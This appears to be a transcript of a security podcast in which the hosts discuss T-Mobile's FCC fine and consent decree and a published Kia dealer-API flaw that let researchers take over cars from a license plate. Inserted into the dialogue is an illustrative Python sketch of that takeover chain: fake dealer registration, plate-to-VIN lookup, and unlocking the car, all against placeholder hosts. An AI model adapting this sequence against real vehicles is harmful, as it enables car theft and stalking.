Episode Transcript
Transcript is AI generated, and definitely has errors, although it's better at accurately getting our names, so that's good.
[00:00:00]
Matthew: Welcome to the Security Serengeti. We're your hosts, David Schwendiger and Matthew Keener. Stop what you're doing, subscribe to our podcast, leave us a lovely five star review, and follow us at SerengetiSec on Twitter.
David: We're here to talk about cybersecurity technology news headlines and hopefully provide some insight analysis and practical application you can take back into the office to help protect your organization.
Matthew: Views and opinions expressed in this podcast are ours and ours alone and do not reflect the views or opinions of our employers.
David: Yep. T Mobile is lucky. They're about to get their, their free audit. They've almost filled their Wells Fargo regulatory action punch card.
Matthew: Yay! How exciting for them.
David: I'm sure they're happy about it.
Matthew: as a side note, I just logged into our Twitter account and somebody followed us.
David: No,
Matthew: Yeah, it's interesting.
David: it's [00:01:00] probably a bot.
Matthew: That's a good question. If you're listening and I'm talking about you, I apologize.
David: No, he doesn't.
Matthew: Maybe we should actually post something there. I was actually thinking as like, every time we say that, I think to myself, like, maybe we should just delete that. We don't actually really use the Twitter account. So I don't
David: Well, you're supposed to be posting that show got released and all that stuff. You know, the typical Yeah, but
Matthew: The last one I posted was episode 110, so I'm only 40 behind.
David: was more of a rant with a bunch of slurs in it. So I don't think that one counts.
Matthew: Oh no, here I posted something about episode 127. Oh, the problem was I didn't, haven't changed the pinned post. I've been posting other stuff, but not not actually, ah, whatever. I don't know. I'm actually seriously considering just getting rid of all of my social media. I've already gotten rid of most of it.
Like I don't have a personal Instagram account. I do have a work Twitter account that I use to follow information security folks. And I don't really use any of that for any personal stuff.
David: Hmm.
Matthew: The [00:02:00] only one I've got right now, really. That I use at all is Facebook and I barely use that. And I'm seriously thinking I, the only reason I keep that one around is because it's got a bunch of people from high school and college, but honestly, I never talked to them.
I think I might just delete it. I think I might just go social media free.
David: Oh, one of us. Although, I mean, LinkedIn is technically social media, I guess.
Matthew: thinking about deleting that too, actually.
David: well,
Matthew: It doesn't give me any value either.
David: well, I keep it just for job switching.
Matthew: Yeah. But we should go through and read off our recruiter messages. One of these episodes should be reading off and critiquing recruiter outreach. I don't know how entertaining that would be for anybody else, but I think that'd be entertaining for me.
David: To sucker people into hiring you. Ensure your voicemail recording points them to the
Matthew: Just making fun of them when they try to reach out to you.
David: website or the LinkedIn.com website and check out the link. Bye.
Matthew: Oh yeah. Yeah. Yeah. [00:03:00] Yeah. So, yeah, I
David: All right,
Matthew: All right. Yeah, I guess we can talk about
David: well, I suppose we could talk about what we're
Matthew: All right, all right, all right. First, first article we have for today is from CrankySec. It's actually not from CrankySec. That was just the first version of it that I saw. It's about the T Mobile recent fine that they have to pay, but I saw the CrankySec version first because I follow CrankySec and they called it the cost of doing business.
And you know CrankySec, they have a negative take on everything, but they're frequently right. They just do it in a very negative style. So T-Mobile has been fined $31.5 million for seven breaches over a five-year period. Half of it is a direct fine they have to pay no matter what; half will be forgiven if they spend it on improving their security.
While researching this, because I was thinking to myself, man, this is not very much money, I was trying to find other fines for comparison. And I found an article from six weeks ago where they reached an agreement with a different government group, the Committee on Foreign Investment in the U.S., to pay a $60 [00:04:00] million fine for failure to, quote, prevent unauthorized access to sensitive data and report those incidents in a timely manner, end quote, in 2020 and 2021. Since this is the Committee on Foreign Investment, this is looking at slightly different incidents, but still data-related items.
And then finally, in 2022, T-Mobile had to pay $400 million in response to one of those breaches in 2021. So it seems like this is a real problem for them.
David: It's a, it's what you might call a pattern.
Matthew: This is... you made the joke about Wells Fargo, but this is very similar to how Wells Fargo keeps getting knocked for deceptive banking practices and signing people up for extra accounts they didn't ask for.
David: Yeah, what, what the average person calls criminality
Matthew: So, relevant for the discussion, the U.S. government said the following, quote: when organizations that have data on individuals fail to act as responsible stewards for this data, they externalize the costs onto everyday Americans, end quote. And did I not just say last week, or I guess two weeks ago, that companies treat these breaches [00:05:00] as externalities?
They've had to face almost no consequences for these types of breaches. It looks like the government has decided to start laying a small hammer down. This is like a doctor hitting your knee with a little rubber hammer.
David: until it becomes one of those giant rubber mallets.
Matthew: I mean, eventually, ideally they would start increasing these fines. So they actually matter, but I don't know.
David: Yeah, I mean, a congressman only costs $10,000, so why would you do that?
Matthew: Yeah, we are. It's
David: But I mean, they're going to continue to treat these like externalities, because that's kind of what they are. You know, until we come to an understanding about data ownership, this is still going to be a problem. Because if this data, the data that relates to customers, belongs to the company, then any harm to a customer that comes out of the loss of control of that data is by definition an externality.
But if we decide that this kind of data actually belongs to the people it's collected on, then the company would need a real contract, not just a [00:06:00] EULA, which would hold them accountable. You could have fees built into it for any kind of data loss or misuse. And if they're holding data for someone they don't have a contract with, then they're thieves, you know, and then there would be criminal as well as civil punishments for it.
Matthew: It's interesting. So you're proposing that when they take our data, they have to sign a contract with us individually that says what they can do with the data. And then they have to pay us for their use of that data.
David: Right. If they decide to collect it, then they have to gain your consent to collect it and maintain it. So that would be a contractual obligation because what they're collecting doesn't belong to them. Belongs to you. So that would force them into a contract to protect it. And then that contract could state what could be done with that data, whether they share it, how they use it, et cetera, et cetera.
And this is kind of, it's almost the, the, the principle it's. It's, it's kind of what the principle is behind the GDPR, even though they don't come out and say that that person owns their data with the right to forget the, the ability to [00:07:00] correct it, et cetera. But I think if we need to really come down, settle, settle on it and say, that data belongs to you and you are leasing it to the company to use it.
That we need to make that a formal thing because we're really beating around the bush here by charging these companies and finding these companies when they lose this data, when it impacts people as an externality. we're trying to say that the company owns it. If they lose it, then somebody, then they have to pay somebody else.
I mean, if I lose my, you know, my pocket knife. You know, it's only impacting me. It doesn't impact anybody else because it's mine. But you know, when they lose this data, they're saying, well, you hurt someone else now, even though that's your data, you own it, just it's, it's like I said, that's the definition of externality.
Matthew: It's interesting. I mean, I know the way companies work: they would come up with some contract that everyone has to [00:08:00] sign, and they'd all come together and use a similar contract that gives us almost no power. But at least we would have the option of saying, all right, then I'm not using you. Because right now it doesn't matter who you use; they almost all sell your data,
David: Right.
Matthew: so you would have an actual choice. Like, I will use this vendor, who will at least do what is reasonably in line with my beliefs.
David: Yeah. I think I had mentioned this on a previous podcast, and unfortunately I can't find the reference now, but there was an organization that was attempting to create... I don't know what a good term for it would be, so I'll just call it a data vault, where you would keep a list of metadata about yourself.
And then you could sell access to that data to different companies. They couldn't copy the data out of it, but they could access the vault under a contract, because it's your vault, and because you're the owner, you could sell access to it.[00:09:00]
Matthew: Yeah, that's
David: That way, no company would maintain any of this data. They would simply access these vaults instead, based on the contractual relationship with the vault owner.
Matthew: Yeah. And
David: That was an interesting idea.
Matthew: You could potentially limit the time you grant them access to, like a week or a day or something. Although they could copy it... well, the thing is you can't copy it. You can only
David: Access, right? Yeah. I mean, the possibilities are almost limitless.
Matthew: Yeah. Interesting. All right. The government is attempting to force them, through the forgiven half of the fine and a consent decree, to do the following items, summarized. There's actually a lot more detail in the consent decree; they have the summarized list, and then they've got like 15 pages of more detail. We will hit a couple of those things, but we're not going to go over 15 pages.
They have to have a CISO who reports to the board.
David: Imagine that.
Matthew: And according to [00:10:00] CrankySec, as of October 1st they did not have a CISO listed. Implement zero trust and segment the network. The segmentation one seems a little odd, like, were they not segmenting before? But the zero trust one seems a little excessive. Zero trust is tough.
David: Yeah. Well, I think they're also supposed to get a unicorn for the patio,
Matthew: Ooh, the regulator wants a unicorn and a shrubbery. Minimize and delete data. Have a critical asset inventory, which is hilarious, because that's one of those things where forever people have been saying, you need to have a critical asset inventory. And it seems like it's so simple, but
David: It sounds simple because people are used to physical things. Like, you have an inventory in a warehouse: easy, right?
Matthew: Yeah.
David: The digital space is a little bit more complex than that.
Matthew: unfortunately,
David: Especially when you don't start keeping an inventory when you buy things, because all companies start off as startups, in which case it's more like a drug dealer with a bunch of stuff stacked in a shoe closet. You know, like, [00:11:00] yeah, we don't really have an inventory of what's in there. And then later on they decide, oh, well, we need to inventory it. So they start digging stuff out of the shoe closet, and then they find out there's stuff in the basement and there's stuff in the attic and it's all over the place.
Matthew: Yeah. And then have a third-party assessment of their security capabilities. So were they not doing pen tests at all? It's difficult for me to tell from this consent decree whether this is just a laundry list of stuff they think you should do, or actually things they were not doing before.
Like the CISO one is very easy to tell, like there's not a CISO listed, they do not have a CISO. But what about the rest? Do you think they were doing them and just not doing them well enough or not doing them at all?
David: I know. I mean I, I took it to mean that if they call it out specifically, then they weren't doing it.
Matthew: Yeah, I mean it could be.
David: and I mean, and they don't have a CISO today.
Matthew: Yeah, they don't have a CISO.
David: Because I was thinking, well, why would they call out these specific things and not other things? Obviously there's a ton of things they could call out as far as what should be in a security [00:12:00] program that they didn't.
So I made the assumption that this means they were not doing these things. Because even if they were doing them and doing them poorly, they were still doing them, so the government couldn't say that they weren't; it's just that they're terrible at it. And I know the government is trying to start fining people for being bad at stuff.
Not just for not doing things, but for being poor at it.
Matthew: Yeah, I don't know. All right, so, discussion points. CrankySec points out that this fine is less than what the CEO made last year. The CEO apparently made $36 million last year, so this fine is chump change.
David: Well, I mean, it might have to forego an ivory backscratcher or two.
Matthew: Yeah. I was going to point out that it might have been a business decision, where they decided that getting popped and paying the fine was cheaper than the cost of security. But then I saw that they had that $400 million fine two years ago.[00:13:00]
David: Yeah. And that $400 million, that's 5 percent of net income.
Matthew: Yeah. But that's still gotta be more expensive than the cost of the security program. Right? Like, I don't think they would spend 400 million on security.
David: Yeah. It would seem unlikely,
Matthew: I wonder if there's, yeah.
David: If they assumed they would never have to pay $400 million, you know, if they assumed that any fine they get is only $30 million, then they might be too willing to take that risk.
Matthew: Interesting. All right. So, obviously this is Search Labs, this is an AI overview, it may not be true, but it says that on average companies spend 5 to 20 percent of their IT budget on cybersecurity, and the IT budget is 3 to 5 percent of their total annual budget. So I'm reading that their IT budget is 3 to 5 percent, and they're spending 5 to 20 percent of that.
So between 0.15 [00:14:00] percent and 1 percent of their total annual budget. So that $400,000,000 is about five times...
David: Well, we don't know what their budget is. I only know what their income was, which
Matthew: That's what I was doing. I was
David: 8. 3 billion.
Matthew: Yeah, but you said $400,000,000 would be 5 percent of that. And this was saying that many companies spend about 5 percent of their budget on IT. So $400,000,000, if you believe that, would be about what they would spend on IT. And then they'd spend between 5 and 20 percent of that on security.
David: I see what you're saying. Right.
Matthew: So like $80 million on security, max. So it does seem like the $32 million fine would be less than what they would spend on security; they could pay that fine every year and still come out ahead.
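As a rough back-of-the-envelope sketch of that math (a sketch only: the 3-5 percent and 5-20 percent figures come from that AI overview, and the $8.3 billion is net income rather than a true operating budget):

```python
# Back-of-the-envelope estimate of T-Mobile's plausible security spend,
# using the AI-overview percentages quoted above. All inputs are assumptions.
net_income = 8.3e9                    # ~$8.3B, the figure David cited

it_budget_low  = net_income * 0.03    # IT budget at 3% of the total
it_budget_high = net_income * 0.05    # IT budget at 5% of the total

sec_low  = it_budget_low  * 0.05      # security at 5% of the IT budget
sec_high = it_budget_high * 0.20      # security at 20% of the IT budget

print(f"IT budget:      ${it_budget_low/1e6:,.0f}M - ${it_budget_high/1e6:,.0f}M")
print(f"Security spend: ${sec_low/1e6:,.0f}M - ${sec_high/1e6:,.0f}M")
# Roughly $12M - $83M a year on security, which is why a $31.5M fine
# looks like a line item rather than a deterrent.
```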
David: You know, and the thing is, you think about T-Mobile, which is an international telecom.
Matthew: Yeah.
David: Their infrastructure has got to be huge.
Matthew: Yeah.
David: If they're spending that on their security, they're probably underspending. I mean, if you had a normal [00:15:00] business, a regular business, a retailer or whatever, that was making $8.3 billion a year, they do not have the technical infrastructure that a telecom has to defend. So they could get away with a lot smaller cyber spend than a telecom. So T-Mobile was just penny pinching.
Matthew: That's about right. So, do you think the government should be able to force a private company to do this? I mean, I guess technically with a consent decree they're not actually forcing them; the company doesn't have to agree to it.
David: I'm sure they don't.
Matthew: That's really dumb. Yeah, the consent decree does say that implementing these controls will probably cost an order of magnitude above and beyond the cost of the fine, the $16 million there. The government estimates that this will cost at least $160 million.
David: Yeah. So we're going to fine you $15 million, and then we're going to have you sign a document which basically commits you to spending another, you know, $150 or $160 million on [00:16:00] stuff. And we'll give you a discount on that stuff by allowing you to retain $15 million from the $30 million fine.
Matthew: Well, they'll probably get to also deduct it depending on how they're, yeah, probably some level of tax write off for that too, so.
David: Mm hmm.
Matthew: Good for them.
David: They've got a team of lawyers figuring this out, so I'm sure this is not that terrible for them, probably.
Matthew: So based on the terms... oh wait, we already talked about this, so never mind. We talked about some of the things in the consent decree and whether T-Mobile was doing them, like not having a CISO. But I'm curious about the comment about zero trust and segmentation.
Does that mean that their network wasn't segmented? I mean, they're such a large company. Like you just mentioned, I feel like there has to be some level of segmentation in there just for IT management's sake. In the document, they did mention that apparently at least one attacker was able to guess passwords for a server, then move laterally across multiple network environments and a lab environment.
So
David: Well, they called out segmentation, or [00:17:00] firewall auditing, between production and non-production. So I think the only segmentation they were specifically thinking about when they wrote that was simply separating production from non-production, versus what we would think of as segmenting different parts of production off from other parts of production.
Matthew: Yeah.
Yeah, could be. It also mentioned MFA, which, again, makes me wonder if they're not using MFA. The consent decree doesn't say everyone needs to, just covered individuals who access covered information.
David: Yeah. And apparently they have to encrypt admin passwords now.
Matthew: Man, that is so harsh. I can't believe that. I can't believe they are making them encrypt admin passwords.
David: You know, my guess is that that was called out because they found a spreadsheet or something that was used by the IT department. That had a list of passwords in it.
Matthew: Absolutely. They've got two years to do it. Limit consumer [00:18:00] information collected and have a retention schedule. So they were collecting too much and keeping it too long. I can't believe it.
David: Never know when you're going to need that information, Matt. So keep it forever.
Matthew: I mean, that's probably what they're doing. As we've been finding out, there are more and more things you can monetize. They probably figured, well, let's just keep it and see if we can do something with it at some point.
David: Yep. I mean, there's no reason to throw out somebody's record just because they don't use you anymore as a, as a telecom. Mm hmm. I
Matthew: Yeah, it really, really depends on, I mean, it's really cheap to keep information, so.
David: mean, dang those cheap hard drive costs. But assuming T-Mobile was not doing everything that was called out in that agreement, there are a lot more issues at T-Mobile than just what's on the highlighted list. And that list Matt went over, with the CISO, the third-party assessment, and the critical asset inventory, virtually every article had that exact same [00:19:00] list.
I didn't see any article that really dug farther down into the details, but we're going to go through a couple of other things that were called out in the document beyond that short list. For one thing, T-Mobile must have a written cybersecurity program. So they actually have to write down what their cybersecurity program is, rather than saying, ah, we have a vague feeling about it.
Matthew: It was all based on vibes before.
David: Another good one. T Mobile must regularly conduct vulnerability scans on externally facing ports on the T Mobile network.
Matthew: People aren't doing that? That's wild.
David: T Mobile must maintain an intrusion prevention system.
Matthew: It's an Avenue IPS.
David: And, not less than annually, review the tuning of these systems.
Matthew: That one's interesting. I've actually never been at a company that reviews the tuning of an IPS annually.
David: I have and it's no fun.[00:20:00]
Matthew: Yeah, like what does that mean? Like you go over every single rule and like every single exception. Like, I would assume that you could just use the penetration test to kind of validate that it works.
David: No, you do. The way they did it was they ran what they thought was a false positive report annually,
Matthew: All right.
David: and then decided which rules to keep and which ones to let go. I'm not saying that's the right way. Personally, I think this annual review is a waste of time. This should be something that's continuous, based on your reports. Too many false positives, you fix it. Every time you get a false positive, you review the false positive ratio for that event and then decide if you're going to move it into corrective territory or not.
Matthew: Hmm.
David: But anyway, another good one: they have to maintain a triage process to prioritize the alerts and respond to them in a [00:21:00] timely manner.
Matthew: Oh no, you have to respond to alerts.
David: And have a triage process. That's terrible.
Matthew: have a triage process. Yeah,
David: Who would do that?
Matthew: like randomly selecting like, hmm.
David: Who knows what the heck they were doing?
Matthew: Oh boy.
David: And here's my favorite: T-Mobile shall not misrepresent, in its privacy policy statements on its website or its subscriber agreements or other communications or representations made to consumers, the extent to which T-Mobile reasonably protects the privacy or security of consumers' covered information.
Matthew: Oh, so they can't just say like, Oh no, we're doing everything to,
David: In other words, they can't commit fraud.
Matthew: that's wild.
I can't believe it. I'm stunned. So, on the other side of that, we talked about whether the government should be able to do this to a company or not. Do you [00:22:00] think the company should take a deal where the government waives fines in exchange for, in this case, improving security, especially if the overall cost is an order of magnitude above and beyond the fine?
So, I mean, I think that they should safeguard my data, but this type of thing is always a business decision. It's not about how Matt feels about his data.
David: Yeah. Well, the way that I read this actually is, I think they were blackmailing them
Matthew: Hmm.
David: Because there's a statement in the agreement which says: in express reliance on the covenants and representations in this consent decree, and to avoid further expenditure of public resources, the Bureau agrees to terminate the investigations. So in other words, hey, you agree, or we're going to keep digging until we find something more serious. Yes.
Matthew: Interesting. So this is, this goes back to what you were saying a minute ago about blackmail.
David: You know, I'm going to hold my hand out here. And if money were to fall into it, I may have something else to do this afternoon.
Matthew: [00:23:00] Yeah. All right, final discussion item for me. Should other companies use this consent decree as a reasonable list of what the government expects and measure themselves against it? In case of a breach, for example, if you're doing all of these things and you still got breached, do you get to tell the government you did the best you could, or would they expect more?
David: Well, this is the whole point of frameworks, right? And this is one of the things I think you and I have been complaining about since we started this podcast: the arbitrary nature of all these decisions the government makes whenever they do these investigations, assess failures, and levy fines. It's arbitrary across the board, depending on who the regulator is, who the individual auditors are, and which company is being accused of malfeasance, versus having something that says, you will do these things, and everybody's held to the same standard. So, I don't know, it's just across the board a bad way to do it, a [00:24:00] bad way to do business. But it's the way the government likes it, because it gives them that leeway to punish those they want to punish and let off those they don't.
Matthew: Yeah, hmm. I like your point about the frameworks. Why not just tell them to meet NIST 800-53 or something? Why are they doing all of this separately? I don't know. It's weird.
David: Well, like I said, I think it's purposeful though, because that does give them the leeway of punishing who they want and to look the other way for those that they don't want to.
Matthew: Yeah, that's fair. All right, so why does this matter? Well, this is opening up a can of worms. If you're breached and the government decides to make an example out of you, there are lots of things they can do to mess with your life.
David: Alrighty, moving on to the next article. Hacking [00:25:00] Ikea... or not Ikea, Kia: remotely controlling cars with just a license plate. And this comes to us from SamCurry.net. The author and some compatriots discovered there was a way to take advantage of Kia's dealership API endpoints to allow them, using only the license plate, to take, I guess, electronic ownership of Kia vehicles. Which means they could find the vehicle, they could get into the vehicle, and they could steal the vehicle.
Matthew: Sounds like fun.
David: Yeah, I mean, anytime you've heard people say you know, I really wish I could steal a Kia. Well, there's an app for that now.
Matthew: This is yeah.
David: Well, if you go to the article we've got linked here, they've got a video of a dude who wrote a smartphone app and was doing all these things via the app on his phone. It's pretty slick. So [00:26:00] what the attackers, or the researchers, did was discover they could register themselves as a Kia dealer; there were no checks to validate that that's who they were. Then they were able to use their access as a dealer to make API calls that would get them access. And the way they did this was via the VIN on the car. They could look up the license plate, which would link to the VIN, and then get access to the car via this dealer API, what I think they call a dealer proxy. And I was thinking there must be some formal agreement between Kia and DMVs so that the VIN and the license plate could be associated with each other, but apparently not, because there are a bunch of companies where you can get a VIN from a license plate number via an API call.
[00:27:00] There'll be a link to one of them in the show notes. And in their documentation, or their frequently asked questions, they ask: how can we do this? And they say, quote, we have agreements with public and private sector data partners. End quote.
Matthew: That's it.
David: That's it. That's how they can do it.
Matthew: Yay, good for them. I guess. We have agreements.
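A sketch of the chain the researchers describe, purely for illustration: the endpoint paths, hostnames, and field names below are hypothetical, not the actual Kia or plate-lookup APIs (those are in Sam Curry's write-up); only the overall flow of dealer signup, token, plate-to-VIN lookup, and vehicle commands reflects the article.

```python
# Illustrative sketch of the attack chain described in the write-up.
# All endpoints, hosts, and field names here are made up; only the flow
# (fake dealer -> token -> plate -> VIN -> vehicle commands) is from the article.
import requests

DEALER_PORTAL = "https://dealer.example-kia.invalid"    # hypothetical host
PLATE_LOOKUP  = "https://plate-to-vin.example.invalid"  # hypothetical lookup service

def register_fake_dealer() -> str:
    """Step 1: self-register as a 'dealer'; no validation was performed."""
    resp = requests.post(f"{DEALER_PORTAL}/register", json={
        "name": "Totally Real Motors",
        "email": "attacker@example.com",
    })
    return resp.json()["access_token"]   # dealer-level API token

def plate_to_vin(plate: str, state: str) -> str:
    """Step 2: resolve a license plate to a VIN via a commercial lookup API."""
    resp = requests.get(PLATE_LOOKUP, params={"plate": plate, "state": state})
    return resp.json()["vin"]

def take_over_vehicle(token: str, vin: str) -> None:
    """Step 3: use the dealer proxy to reassign the vehicle, then send commands."""
    headers = {"Authorization": f"Bearer {token}"}
    requests.post(f"{DEALER_PORTAL}/vehicles/{vin}/owner",
                  headers=headers, json={"email": "attacker@example.com"})
    requests.post(f"{DEALER_PORTAL}/vehicles/{vin}/commands",
                  headers=headers, json={"command": "UNLOCK"})

if __name__ == "__main__":
    token = register_fake_dealer()
    vin = plate_to_vin("ABC1234", "MD")
    take_over_vehicle(token, vin)
```

The point of the sketch is how short the chain is once the dealer registration step has no identity check; everything after that is ordinary authenticated API calls.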
David: And the way this whole thing works is, to quote the researcher, they could execute internet-to-vehicle commands. You know, for when you want to drive your car, which is in Iowa, while you're in Arkansas.
Matthew: I, well, I don't think you can actually drive it.
David: No, I'm just saying your car is a physical thing; you can't use it if you're not there, right? So why do you need to access your car over the internet? That's my point. Thank you.
Matthew: that's fair.
David: you could fix this whole thing by not connecting the car to the internet.
Matthew: Yeah. Well, I mean, it's for [00:28:00] lazy people who do not want to go outside to a cold car; they want to start it and get it heated beforehand.
David: Well, they used to just have remote start doohickeys back in the day that were just RF.
Matthew: Yeah.
David: Now, this is just taking these ideas and making them a reality when they're completely unnecessary and, I think, pose a greater risk than benefit.
Matthew: Right. Yeah. There seems to me to be very little benefit to some of these. Like start and stop the car: all right, you can warm the car up on a cold morning, awesome, or cool it down on a hot day. And lock and unlock the car remotely, honk the horn remotely, geolocate the vehicle. I guess geolocating the vehicle might be somewhat useful if you forgot where you parked it, but I don't have that problem, so
David: Yeah, the same thing with honking the horn. You're in the parking lot and you're just like, well, I'll honk my horn and then just go to the sound.
Matthew: So the real answer here, though, is that if you don't have this connectivity, you cannot sell a subscription [00:29:00] to use their app. So my wife has a Toyota, and she got the app and the remote start functionality for free, and the lock-the-car-if-you-forgot-to-lock-your-doors feature she got for free for the first year, but now it costs us like 200 bucks a year or something to maintain that.
David: Holy cow.
Matthew: Oh wait, it's less. It's only $8 a month, or $80 a year. Still, this gives them a way where they have sold you a physical car, and now they are charging you a subscription on top of that. It's kind of like, I don't know if you saw the BMW one, where to get access to the heated seats you had to pay an additional fee each year.
David: Oh, nice.
Matthew: Yeah, this is that rent-seeking thing that every company is looking for now. It's not enough to sell you something; we have to figure out some way to get you to keep buying that thing, forever and ever. All right.
David: Right. So now your car comes with in-app purchases.
Matthew: Oh my God. Can you imagine that? Like, pay us $20 right now to get the top two levels of your fan on your air [00:30:00] conditioning. We've noticed it's a hundred degrees outside. Would you like to get cooler faster?
David: Yeah, it only goes up to number two. You know, this is funny to me because Philip K. Dick envisioned this 40 years ago. I can't remember the name of the short story, but it starts off with this guy needing to get out of his apartment and his door refusing to let him out until he paid.
Matthew: Microtransactions everywhere. Can you imagine that it costs you a quarter to unlock your door to get into the car and
David: that's
Matthew: and then $2 to get out.
David: It's like, he wanted toast, and it cost a nickel to get some toast. It's crazy. And so, you know, it's unbelievable that he envisioned that long before smartphones and even really the internet.
Matthew: So, okay. So here's a weird take on that. If those numbers actually matched up to how much it costs to do that thing, I wouldn't mind. So for example, like five cents to create toast. Like, that might make sense in terms of the electricity used and the wear and tear on it. But you know that [00:31:00] these companies are not doing this based on the cost.
They will sell you the thing, and then they will also charge you more. But like, if every time you did something you saw how much it costs, I feel like people would make a lot more economical decisions.
David: Well, it used to be that when you bought the thing, you, you paid for the capability to do what you're talking about, right? When you bought the car, you bought the car with the capability to turn the fan all the way up.
Matthew: Yeah. Well, what I'm thinking of right now is roads. The US is behind quite a bit in terms of maintenance for roads, and a lot of that is not the fault of cars. Apparently damage to roads goes up geometrically based on the weight of the vehicle.
So big trucks, construction vehicles, and such are doing way, way more damage to the road than regular cars, but they're paying similar amounts, [00:32:00] like, basically, we are subsidizing all of them. And that makes sense; I mean, we pay for it either way. Either we charge them a toll that reflects the damage they're doing to the road,
and then they charge us higher prices on their goods, or we pay more in taxes to fix the roads. Either way it gets paid for. I was just thinking it'd be nice to see exactly how much everything costs, because there are so many costs that we don't really think about. Like, every day we live in a house, say $3,000 for your mortgage, just because it's easily divided by 30 days:
that's $100 a day it costs you to live in your house. And maybe you pay $90 a month for electricity; that's $3 a day you're paying for that electricity. There are a lot of things that are kind of, it's not externalized, what's the word I'm thinking of, where they're set aside in such a way that it's difficult to see, kind of day by day,
what it's costing you. There's a word for that, and I cannot think of it. So I was just thinking, in [00:33:00] some ways it'd be nice to see what your actions cost you directly. Like, ding, this just cost me $25. I may not have paid $25 right this second, but it's going to cost me in, you know, bills and stuff like that.
David: Right.
Matthew: When you harass a woman, ding, this is going to cost me $25,000 in lawyer fees.
David: Well, you must not have been harassed or very much if it's only 25, 000.
Matthew: You send an email to your boss, ding, this is going to cost you your salary for the next six months, because they're going to fire you. Anyways, I digress.
David: Yeah, well, as far as the bigger trucks go, considering there's a gas tax, and they're generally less efficient and get fewer miles to the gallon, so they have to pay for more gas, maybe they are paying more because of that inefficiency.
Matthew: I think... well, I dunno, I read an article, and you know how truthful articles are and how we should rely on them constantly.
David: yeah, and what I'm saying also assumes that they're actually spending [00:34:00] the gas tax on the infrastructure and not ivory back scratchers and plasma TVs.
Matthew: Yeah. Big screen TVs have gotten so cheap. I mean, they're basically free.
David: Yeah, and you have all that leftover money in September, which you have to spend before next year's budget starts in October. So,
Matthew: You know, it would be amazing if the leftover money they didn't spend got automatically rebated to people.
David: But they never have any leftover money, because they blow it all in September. I've worked government contracts for a lot of years, and every September, regardless of the organization I was in, government people always came and asked for people to figure out how to spend money.
I mean, sometimes millions and millions of dollars. But hey, we are four million dollars under budget, so we have to find something to spend all this money on. One place I was at, they were so under budget that they decided to buy a personal printer for every worker at the location.
Matthew: Personal [00:35:00] printer.
David: A $50 personal printer.
And the ink cartridges to recharge those printers cost a hundred dollars. And they did this, but never got the printers out of the warehouse and handed them out. So they just sat in the warehouse till they became end of life. Tax dollars at work, people.
Matthew: So, I mean, I agree. You'd have to change the process such that they didn't lose the money the next year if they didn't spend it, and the leftover money just got rebated every year. But either way, it's a pipe dream, so I guess it doesn't really matter.
David: Yeah. The government doesn't have customers, you know, so they have, they have no need to serve those customers in an efficient manner.
Matthew: that's fair.
David: Their subjects have nowhere to go, unlike businesses, who have customers, and their customers could go somewhere else.
Matthew: Fair enough. All right. Also, other items: if you don't have the car connected to the internet, then the government can't track you in it. We previously talked about [00:36:00] car companies selling your speeding and driving data to insurance companies, and, I don't remember which company we talked about at the time, but it's come out that more companies are doing this.
At least one of them is calling it a quote-unquote safe driver program. It was confirmed Hyundai did this between 2018 and 2024 for 1.7 million vehicles, with no disclosure to the owners at all that it sold their location and speeding data. And we've talked before about how the government is getting around the Fourth Amendment and other constitutional protections by buying data from third-party sources.
So theoretically, the government could, if they haven't already done this, just go out and buy all of our data and just start matching it up with places that known crimes have occurred. And, you know, if you just happen to coincidentally be in the area, well, sad for you, you may be connected by some circumstantial data now.
And we all know that the government is really good about making sure that they've caught the right person.
David: Yeah. Well, you may have also parked your car near a free speech zone.
Matthew: What's the free speech zone? Oh, the protests? Yeah. [00:37:00] Yep. I would love to go to a protest sometime, even if it was for something I don't necessarily agree with; I still kind of want to just go. But now that I know that they're watching and doing facial recognition on everybody, I'm like, nope.
Nope, nope, nope. No, because I will end up on more lists. While most of these are more annoying than dangerous, I could see issues with stalkers and exes, where you submit the license plate and geolocate them. Also, I could see that stopping the car in the middle of the interstate might be somewhat dangerous, and I was talking with my wife about this earlier.
Theoretically, you could set it up so you search for cars near you. Since you have the license plate, you might be able to look up all the license plates registered in an area near you, find the VINs, find one, unlock it, turn it on, and steal it.
David: Grand Theft Auto in reality. Where, you know, you just steal a car to get to the other side of town, then you just abandon it,
Matthew: you just
David: and then you steal another car later to go somewhere else.
Matthew: [00:38:00] I know that a lot of modern cars have protections against that. Again, my wife has the Toyota with the app, so when you remote start it and then you open the car door and get in, it actually turns off. But I don't know if all automakers have that protection, or if you can use the app to fool it into thinking you have the key or something,
David: can you get it to roll down the window?
Matthew: well, I mean, getting into the car, you can definitely do. The question is whether or not it will drive off without the key. Like, is the app enough or does it require the key?
David: you should do some experiments.
Matthew: I would need to get access to this app to do that. I mean, we could do it
David: I'm saying your wife's car.
Matthew: Yeah. We could do it with the Toyota one.
David: it with the car, with the window down and then climb in and see if you can drive away.
Matthew: Oh, oh, I see what you mean. Oh, interesting. That would, I would look ridiculous.
David: Because you figure, imagine the car's running, or you could start the car; you could smash the window, climb in, and then drive off, maybe.
Matthew: Yeah. Yeah, that's interesting. All right. Yeah, that'd be possible, maybe. So which
David: do some [00:39:00] experimentation, report back.
Matthew: So I did a quick search for cars that are not internet connected, and sometimes you can dodge this by getting the base model of the car, which doesn't have the hardware to connect. According to Reddit, which is of course a top quality source, the component to connect it to the internet is kind of expensive, so they tend to leave it out.
Well, I'll talk about that in a second. Some people say you can
David: Oh, hold on a second. This made me think: you know, your wife's paying for that subscription to the Toyota app. Does that
Matthew: Edit that out. I don't want anybody to know.
David: Does that mean that you're paying for the data feed for the connection? Like, part of that fee is the actual connection to the internet with a SIM card, or however the car connects to the internet.
I assume it's got to be a SIM card, because it's probably cellular, right?
Matthew: Yeah, I think
David: Because that's the only way you're going to have broad-scope [00:40:00] coverage. So if you're not paying for a subscription, then they would have to pay for that internet connection themselves. And actually, I wonder... they would have to have a SIM card to do this. Maybe you could just find the SIM card in the car and yank it.
Matthew: That's a possibility. That's interesting. Some people online said you can remove the component afterwards through a mechanic and then flash the software in the head unit, whatever that means, and then you no longer have that connectivity, but that sounds like that's pretty involved. Or
David: Yeah, you really got to want it. I would say, you know, you cut the antenna or you put a Faraday cage around the antenna.
Matthew: Well, one of the
David: I thought about that idea before. I was thinking, if it's all going out through the antenna on the roof of the car, you build a Faraday cage, a small Faraday cage just bigger than that antenna.
And you put some really heavy-duty magnets on the bottom with some felt, and you just put that over top of your antenna to prevent signals from being able to get in and out of the [00:41:00] antenna.
Matthew: Yeah, I could see that.
David: If that's the antenna that does that anyway,
